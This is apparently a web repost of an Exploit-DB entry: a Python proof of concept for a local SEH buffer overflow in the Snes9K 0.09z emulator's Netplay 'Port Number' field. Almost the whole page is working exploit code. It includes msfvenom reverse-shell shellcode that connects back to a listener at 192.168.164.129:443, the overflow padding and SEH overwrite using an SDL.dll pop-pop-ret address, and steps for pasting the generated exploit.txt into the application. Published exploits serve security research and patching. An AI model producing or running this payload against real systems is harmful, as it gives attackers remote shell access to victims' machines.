[local] Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)

4 years ago 196
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH) # Date: 2020-07-20 # Exploit Author: MasterVlad # Vendor Homepage: https://sourceforge.net/projects/snes9k/ # Software Link: https://www.exploit-db.com/apps/ef5249b64ce34575c12970b334a08c17-snes9k009z.zip # Version: 0.09z # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 10 x64 # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open Snes9K 0.09z # 4. Click on Netplay -> Connect to Server # 5. Paste the clipboard into the "Port Number" field # 6. Click on Connect and then on OK #!/usr/bin/python # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py buf = "" buf += "\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29" buf += "\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f" buf += "\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71" buf += "\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9" buf += "\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4" buf += "\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93" buf += "\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8" buf += "\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b" buf += "\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6" buf += "\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28" buf += "\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d" buf += "\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f" buf += "\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8" buf += "\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86" buf += "\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83" buf += "\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0" buf += "\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3" buf += "\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79" buf += "\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde" buf += "\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7" buf += "\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2" buf += "\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8" buf += "\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd" buf += "\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72" buf += "\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05" buf += "\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c" buf += "\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1" exploit = "A"*420 exploit += "\x74\x06\x75\x04" # 0x10015140 pop pop ret; SDL.dll exploit += "\x40\x51\x01\x10" exploit += "\x41"*(2000-428-len(buf)) exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()
Read Entire Article